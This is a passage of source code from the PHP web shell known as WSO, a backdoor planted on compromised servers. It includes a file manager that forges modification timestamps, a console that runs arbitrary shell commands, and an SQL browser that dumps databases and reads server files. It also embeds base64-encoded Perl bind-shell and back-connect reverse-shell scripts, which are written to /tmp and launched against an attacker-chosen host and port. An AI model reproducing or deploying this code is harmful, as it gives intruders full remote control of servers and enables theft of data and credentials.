    echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>'; 
595
    if( empty($_POST['p2']) ) 
596
        $_POST['p2'] = 'view'; 
597
    if( is_file($_POST['p1']) ) 
598
        $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); 
599
    else
600
        $m = array('Chmod', 'Rename', 'Touch'); 
601
    foreach($m as $v) 
602
        echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> '; 
603
    echo '<br><br>'; 
604
    switch($_POST['p2']) { 
605
        case 'view': 
606
            echo '<pre class=ml1>'; 
607
            $fp = @fopen($_POST['p1'], 'r'); 
608
            if($fp) { 
609
                while( !@feof($fp) ) 
610
                    echo htmlspecialchars(@fread($fp, 1024)); 
611
                @fclose($fp); 
612
            } 
613
            echo '</pre>'; 
614
            break; 
615
        case 'highlight': 
616
            if( @is_readable($_POST['p1']) ) { 
617
                echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">'; 
618
                $code = @highlight_file($_POST['p1'],true); 
619
                echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>'; 
620
            } 
621
            break; 
622
        case 'chmod': 
623
            if( !empty($_POST['p3']) ) { 
624
                $perms = 0; 
625
                for($i=strlen($_POST['p3'])-1;$i>=0;--$i) 
626
                    $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); 
627
                if(!@chmod($_POST['p1'], $perms)) 
628
                    echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>'; 
629
            } 
630
            clearstatcache(); 
631
            echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>'; 
632
            break; 
633
        case 'edit': 
634
            if( !is_writable($_POST['p1'])) { 
635
                echo 'File isn\'t writeable'; 
636
                break; 
637
            } 
638
            if( !empty($_POST['p3']) ) { 
639
                $time = @filemtime($_POST['p1']); 
640
                $_POST['p3'] = substr($_POST['p3'],1); 
641
                $fp = @fopen($_POST['p1'],"w"); 
642
                if($fp) { 
643
                    @fwrite($fp,$_POST['p3']); 
644
                    @fclose($fp); 
645
                    echo 'Saved!<br><script>p3_="";</script>'; 
646
                    @touch($_POST['p1'],$time,$time); 
647
                } 
648
            } 
649
            echo '<form onsubmit="g(null,null,null,null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>'; 
650
            $fp = @fopen($_POST['p1'], 'r'); 
651
            if($fp) { 
652
                while( !@feof($fp) ) 
653
                    echo htmlspecialchars(@fread($fp, 1024)); 
654
                @fclose($fp); 
655
            } 
656
            echo '</textarea><input type=submit value=">>"></form>'; 
657
            break; 
658
        case 'hexdump': 
659
            $c = @file_get_contents($_POST['p1']); 
660
            $n = 0; 
661
            $h = array('00000000<br>','',''); 
662
            $len = strlen($c); 
663
            for ($i=0; $i<$len; ++$i) { 
664
                $h[1] .= sprintf('%02X',ord($c[$i])).' '; 
665
                switch ( ord($c[$i]) ) { 
666
                    case 0:  $h[2] .= ' '; break; 
667
                    case 9:  $h[2] .= ' '; break; 
668
                    case 10: $h[2] .= ' '; break; 
669
                    case 13: $h[2] .= ' '; break; 
670
                    default: $h[2] .= $c[$i]; break; 
671
                } 
672
                $n++; 
673
                if ($n == 32) { 
674
                    $n = 0; 
675
                    if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';} 
676
                    $h[1] .= '<br>'; 
677
                    $h[2] .= "\n"; 
678
                } 
679
            } 
680
            echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>'; 
681
            break; 
682
        case 'rename': 
683
            if( !empty($_POST['p3']) ) { 
684
                if(!@rename($_POST['p1'], $_POST['p3'])) 
685
                    echo 'Can\'t rename!<br>'; 
686
                else
687
                    die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>'); 
688
            } 
689
            echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>'; 
690
            break; 
691
        case 'touch': 
692
            if( !empty($_POST['p3']) ) { 
693
                $time = strtotime($_POST['p3']); 
694
                if($time) { 
695
                    if(!touch($_POST['p1'],$time,$time)) 
696
                        echo 'Fail!'; 
697
                    else
698
                        echo 'Touched!'; 
699
                } else echo 'Bad time format!'; 
700
            } 
701
            clearstatcache(); 
702
            echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>'; 
703
            break; 
704
    } 
705
    echo '</div>'; 
706
    wsoFooter(); 
707
}
708
  
709
function actionConsole() { 
710
    if(!empty($_POST['p1']) && !empty($_POST['p2'])) { 
711
        $_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out'] = true; 
712
        $_POST['p1'] .= ' 2>&1'; 
713
    } elseif(!empty($_POST['p1'])) 
714
        $_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out'] = false; 
715
  
716
    if(isset($_POST['ajax'])) { 
717
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true; 
718
        ob_start(); 
719
        echo "d.cf.cmd.value='';\n"; 
720
        $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".wsoEx($_POST['p1']),"\n\r\t\\'\0")); 
721
        if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) { 
722
            if(@chdir($match[1])) { 
723
                $GLOBALS['cwd'] = @getcwd(); 
724
                echo "c_='".$GLOBALS['cwd']."';"; 
725
            } 
726
        } 
727
        echo "d.cf.output.value+='".$temp."';"; 
728
        echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; 
729
        $temp = ob_get_clean(); 
730
        echo strlen($temp), "\n", $temp; 
731
        exit; 
732
    } 
733
    wsoHeader(); 
734
    echo "<script> 
735
if(window.Event) window.captureEvents(Event.KEYDOWN); 
736
var cmds = new Array(''); 
737
var cur = 0; 
738
function kp(e) { 
739
    var n = (window.Event) ? e.which : e.keyCode; 
740
    if(n == 38) { 
741
        cur--; 
742
        if(cur>=0) 
743
            document.cf.cmd.value = cmds[cur]; 
744
        else
745
            cur++; 
746
    } else if(n == 40) { 
747
        cur++; 
748
        if(cur < cmds.length) 
749
            document.cf.cmd.value = cmds[cur]; 
750
        else
751
            cur--; 
752
    } 
753
} 
754
function add(cmd) { 
755
    cmds.pop(); 
756
    cmds.push(cmd); 
757
    cmds.push(''); 
758
    cur = cmds.length-1; 
759
} 
760
  
761
</script>"; 
762
    echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;">'; 
763
    
764
	if(empty($_POST['ajax'])&&!empty($_POST['p1'])) 
765
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false; 
766
    echo '</select><nobr><input type=checkbox name=ajax value=1 '.(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>'; 
767
    if(!empty($_POST['p1'])) { 
768
        echo htmlspecialchars("$ ".$_POST['p1']."\n".wsoEx($_POST['p1'])); 
769
    } 
770
    echo '</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>'; 
771
    echo '</form></div><script>d.cf.cmd.focus();</script>'; 
772
    wsoFooter(); 
773
} 
774
  
775
function actionSql() { 
776
    class DbClass { 
777
        var $type; 
778
        var $link; 
779
        var $res; 
780
        function DbClass($type) { 
781
            $this->type = $type; 
782
        } 
783
        function connect($host, $user, $pass, $dbname){ 
784
            switch($this->type)  { 
785
                case 'mysql': 
786
                    if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; 
787
                    break; 
788
                case 'pgsql': 
789
                    $host = explode(':', $host); 
790
                    if(!$host[1]) $host[1]=5432; 
791
                    if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; 
792
                    break; 
793
            } 
794
            return false; 
795
        } 
796
        function selectdb($db) { 
797
            switch($this->type)  { 
798
                case 'mysql': 
799
                    if (@mysql_select_db($db))return true; 
800
                    break; 
801
            } 
802
            return false; 
803
        } 
804
        function query($str) { 
805
            switch($this->type) { 
806
                case 'mysql': 
807
                    return $this->res = @mysql_query($str); 
808
                    break; 
809
                case 'pgsql': 
810
                    return $this->res = @pg_query($this->link,$str); 
811
                    break; 
812
            } 
813
            return false; 
814
        } 
815
        function fetch() { 
816
            $res = func_num_args()?func_get_arg(0):$this->res; 
817
            switch($this->type)  { 
818
                case 'mysql': 
819
                    return @mysql_fetch_assoc($res); 
820
                    break; 
821
                case 'pgsql': 
822
                    return @pg_fetch_assoc($res); 
823
                    break; 
824
            } 
825
            return false; 
826
        } 
827
        function listDbs() { 
828
            switch($this->type)  { 
829
                case 'mysql': 
830
                        return $this->query("SHOW databases"); 
831
                break; 
832
                case 'pgsql': 
833
                    return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); 
834
                break; 
835
            } 
836
            return false; 
837
        } 
838
        function listTables() { 
839
            switch($this->type)  { 
840
                case 'mysql': 
841
                    return $this->res = $this->query('SHOW TABLES'); 
842
                break; 
843
                case 'pgsql': 
844
                    return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); 
845
                break; 
846
            } 
847
            return false; 
848
        } 
849
        function error() { 
850
            switch($this->type)  { 
851
                case 'mysql': 
852
                    return @mysql_error(); 
853
                break; 
854
                case 'pgsql': 
855
                    return @pg_last_error(); 
856
                break; 
857
            } 
858
            return false; 
859
        } 
860
        function setCharset($str) { 
861
            switch($this->type)  { 
862
                case 'mysql': 
863
                    if(function_exists('mysql_set_charset')) 
864
                        return @mysql_set_charset($str, $this->link); 
865
                    else
866
                        $this->query('SET CHARSET '.$str); 
867
                    break; 
868
                case 'pgsql': 
869
                    return @pg_set_client_encoding($this->link, $str); 
870
                    break; 
871
            } 
872
            return false; 
873
        } 
874
        function loadFile($str) { 
875
            switch($this->type)  { 
876
                case 'mysql': 
877
                    return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file")); 
878
                break; 
879
                case 'pgsql': 
880
                    $this->query("CREATE TABLE wso1(file text);COPY wso1 FROM '".addslashes($str)."';select file from wso1;"); 
881
                    $r=array(); 
882
                    while($i=$this->fetch()) 
883
                        $r[] = $i['file']; 
884
                    $this->query('drop table wso1'); 
885
                    return array('file'=>implode("\n",$r)); 
886
                break; 
887
            } 
888
            return false; 
889
        } 
890
        function dump($table, $fp = false) { 
891
            switch($this->type)  { 
892
                case 'mysql': 
893
                    $res = $this->query('SHOW CREATE TABLE `'.$table.'`'); 
894
                    $create = mysql_fetch_array($res); 
895
                    $sql = $create[1].";\n"; 
896
                    if($fp) fwrite($fp, $sql); else echo($sql); 
897
                    $this->query('SELECT * FROM `'.$table.'`'); 
898
                    $head = true; 
899
                    while($item = $this->fetch()) { 
900
                        $columns = array(); 
901
                        foreach($item as $k=>$v) { 
902
                            if($v == null) 
903
                                $item[$k] = "NULL"; 
904
                            elseif(is_numeric($v)) 
905
                                $item[$k] = $v; 
906
                            else
907
                                $item[$k] = "'".@mysql_real_escape_string($v)."'"; 
908
                            $columns[] = "`".$k."`"; 
909
                        } 
910
                        if($head) { 
911
                            $sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')'; 
912
                            $head = false; 
913
                        } else
914
                            $sql = "\n\t,(".implode(", ", $item).')'; 
915
                        if($fp) fwrite($fp, $sql); else echo($sql); 
916
                    } 
917
                    if(!$head) 
918
                        if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n"); 
919
                break; 
920
                case 'pgsql': 
921
                    $this->query('SELECT * FROM '.$table); 
922
                    while($item = $this->fetch()) { 
923
                        $columns = array(); 
924
                        foreach($item as $k=>$v) { 
925
                            $item[$k] = "'".addslashes($v)."'"; 
926
                            $columns[] = $k; 
927
                        } 
928
                        $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n"; 
929
                        if($fp) fwrite($fp, $sql); else echo($sql); 
930
                    } 
931
                break; 
932
            } 
933
            return false; 
934
        } 
935
    }; 
936
    $db = new DbClass($_POST['type']); 
937
    if(@$_POST['p2']=='download') { 
938
        $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); 
939
        $db->selectdb($_POST['sql_base']); 
940
        switch($_POST['charset']) { 
941
            case "Windows-1251": $db->setCharset('cp1251'); break; 
942
            case "UTF-8": $db->setCharset('utf8'); break; 
943
            case "KOI8-R": $db->setCharset('koi8r'); break; 
944
            case "KOI8-U": $db->setCharset('koi8u'); break; 
945
            case "cp866": $db->setCharset('cp866'); break; 
946
        } 
947
        if(empty($_POST['file'])) { 
948
            ob_start("ob_gzhandler", 4096); 
949
            header("Content-Disposition: attachment; filename=dump.sql"); 
950
            header("Content-Type: text/plain"); 
951
            foreach($_POST['tbl'] as $v) 
952
                $db->dump($v); 
953
            exit; 
954
        } elseif($fp = @fopen($_POST['file'], 'w')) { 
955
            foreach($_POST['tbl'] as $v) 
956
                $db->dump($v, $fp); 
957
            fclose($fp); 
958
            unset($_POST['p2']); 
959
        } else
960
            die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>'); 
961
    } 
962
    wsoHeader(); 
963
    echo " 
964
  
965
<h1>Sql browser</h1><div class=content> 
966
<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr> 
967
<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr> 
968
<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'> 
969
<td><select name='type'><option value='mysql' "; 
970
    if(@$_POST['type']=='mysql')echo 'selected'; 
971
echo ">MySql</option><option value='pgsql' "; 
972
if(@$_POST['type']=='pgsql')echo 'selected'; 
973
echo ">PostgreSql</option></select></td> 
974
<td><input type=text name=sql_host value='". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."'></td> 
975
<td><input type=text name=sql_login value='". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."'></td> 
976
<td><input type=text name=sql_pass value='". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."'></td><td>"; 
977
    $tmp = "<input type=text name=sql_base value=''>"; 
978
    if(isset($_POST['sql_host'])){ 
979
        if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { 
980
            switch($_POST['charset']) { 
981
                case "Windows-1251": $db->setCharset('cp1251'); break; 
982
                case "UTF-8": $db->setCharset('utf8'); break; 
983
                case "KOI8-R": $db->setCharset('koi8r'); break; 
984
                case "KOI8-U": $db->setCharset('koi8u'); break; 
985
                case "cp866": $db->setCharset('cp866'); break; 
986
            } 
987
            $db->listDbs(); 
988
            echo "<select name=sql_base><option value=''></option>"; 
989
            while($item = $db->fetch()) { 
990
                list($key, $value) = each($item); 
991
                echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>'; 
992
            } 
993
            echo '</select>'; 
994
        } 
995
        else echo $tmp; 
996
    }else
997
        echo $tmp; 
998
    echo "</td> 
999
  
1000
                <td><input type=submit value='>>' onclick='fs(d.sf);'></td> 
1001
                <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td> 
1002
            </tr> 
1003
        </table> 
1004
        <script> 
1005
            s_db='".@addslashes($_POST['sql_base'])."'; 
1006
            function fs(f) { 
1007
                if(f.sql_base.value!=s_db) { f.onsubmit = function() {}; 
1008
                    if(f.p1) f.p1.value=''; 
1009
                    if(f.p2) f.p2.value=''; 
1010
                    if(f.p3) f.p3.value=''; 
1011
                } 
1012
            } 
1013
            function st(t,l) { 
1014
                d.sf.p1.value = 'select'; 
1015
                d.sf.p2.value = t; 
1016
                if(l && d.sf.p3) d.sf.p3.value = l; 
1017
                d.sf.submit(); 
1018
            } 
1019
            function is() { 
1020
                for(i=0;i<d.sf.elements['tbl[]'].length;++i) 
1021
                    d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked; 
1022
            } 
1023
        </script>"; 
1024
    if(isset($db) && $db->link){ 
1025
        echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; 
1026
            if(!empty($_POST['sql_base'])){ 
1027
                $db->selectdb($_POST['sql_base']); 
1028
                echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>"; 
1029
                $tbls_res = $db->listTables(); 
1030
                while($item = $db->fetch($tbls_res)) { 
1031
                    list($key, $value) = each($item); 
1032
                    if(!empty($_POST['sql_count'])) 
1033
                        $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.'')); 
1034
                    $value = htmlspecialchars($value); 
1035
                    echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?'&nbsp;':" <small>({$n['n']})</small>") . "</nobr><br>"; 
1036
                } 
1037
                echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>"; 
1038
                if(@$_POST['p1'] == 'select') { 
1039
                    $_POST['p1'] = 'query'; 
1040
                    $_POST['p3'] = $_POST['p3']?$_POST['p3']:1; 
1041
                    $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']); 
1042
                    $num = $db->fetch(); 
1043
                    $pages = ceil($num['n'] / 30); 
1044
                    echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">"; 
1045
                    echo " of $pages"; 
1046
                    if($_POST['p3'] > 1) 
1047
                        echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>&lt; Prev</a>"; 
1048
                    if($_POST['p3'] < $pages) 
1049
                        echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next &gt;</a>"; 
1050
                    $_POST['p3']--; 
1051
                    if($_POST['type']=='pgsql') 
1052
                        $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30); 
1053
                    else
1054
                        $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30'; 
1055
                    echo "<br><br>"; 
1056
                } 
1057
                if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) { 
1058
                    $db->query(@$_POST['p2']); 
1059
                    if($db->res !== false) { 
1060
                        $title = false; 
1061
                        echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">'; 
1062
                        $line = 1; 
1063
                        while($item = $db->fetch())  { 
1064
                            if(!$title) { 
1065
                                echo '<tr>'; 
1066
                                foreach($item as $key => $value) 
1067
                                    echo '<th>'.$key.'</th>'; 
1068
                                reset($item); 
1069
                                $title=true; 
1070
                                echo '</tr><tr>'; 
1071
                                $line = 2; 
1072
                            } 
1073
                            echo '<tr class="l'.$line.'">'; 
1074
                            $line = $line==1?2:1; 
1075
                            foreach($item as $key => $value) { 
1076
                                if($value == null) 
1077
                                    echo '<td><i>null</i></td>'; 
1078
                                else
1079
                                    echo '<td>'.nl2br(htmlspecialchars($value)).'</td>'; 
1080
                            } 
1081
                            echo '</tr>'; 
1082
                        } 
1083
                        echo '</table>'; 
1084
                    } else { 
1085
                        echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>'; 
1086
                    } 
1087
                } 
1088
                echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>"; 
1089
                if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile')) 
1090
                    echo htmlspecialchars($_POST['p2']); 
1091
                echo "</textarea><br/><input type=submit value='Execute'>"; 
1092
                echo "</td></tr>"; 
1093
            } 
1094
            echo "</table></form><br/>"; 
1095
            if($_POST['type']=='mysql') { 
1096
                $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); 
1097
                if($db->fetch()) 
1098
                    echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='>>'></form>"; 
1099
            } 
1100
            if(@$_POST['p1'] == 'loadfile') { 
1101
                $file = $db->loadFile($_POST['p2']); 
1102
                echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>'; 
1103
            } 
1104
    } else { 
1105
        echo htmlspecialchars($db->error()); 
1106
    } 
1107
    echo '</div>'; 
1108
    wsoFooter(); 
1109
} 
1110
function actionNetwork() { 
1111
    wsoHeader(); 
1112
    $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; 
1113
    $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; 
1114
    echo "<h1>Network tools</h1><div class=content> 
1115
  
1116
    <form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\"> 
1117
    <span>Bind port to /bin/sh [perl]</span><br/> 
1118
    Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'> 
1119
    </form> 
1120
    <form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\"> 
1121
    <span>Back-connect  [perl]</span><br/> 
1122
    Server: <input type='text' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'> 
1123
  
1124
    </form><br>"; 
1125
    if(isset($_POST['p1'])) { 
1126
        function cf($f,$t) { 
1127
            $w = @fopen($f,"w") or @function_exists('file_put_contents'); 
1128
            if($w){ 
1129
                @fwrite($w,@base64_decode($t)); 
1130
                @fclose($w); 
1131
            } 
1132
        } 
1133
        if($_POST['p1'] == 'bpp') { 
1134
            cf("/tmp/bp.pl",$bind_port_p); 
1135
            $out = wsoEx("perl /tmp/bp.pl ".$_POST['p2']." 1>/dev/null 2>&1 &"); 
1136
            echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bp.pl")."</pre>"; 
1137
            unlink("/tmp/bp.pl"); 
1138
        } 
1139
        if($_POST['p1'] == 'bcp') { 
1140
            cf("/tmp/bc.pl",$back_connect_p); 
1141
            $out = wsoEx("perl /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." 1>/dev/null 2>&1 &"); 
1142
            echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bc.pl")."</pre>"; 
1143
            unlink("/tmp/bc.pl"); 
1144
        } 
1145
    } 
1146
    echo '</div>'; 
1147
    wsoFooter(); 
1148
}
1149
1150
if( empty($_POST['a']) ) 
1151
    if(isset($default_action) && function_exists('action' . $default_action)) 
1152
        $_POST['a'] = $default_action; 
1153
    else
1154
        $_POST['a'] = 'SecInfo'; 
1155
if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) ) 
1156
    call_user_func('action' . $_POST['a']); 
1157
exit; 
1158
?>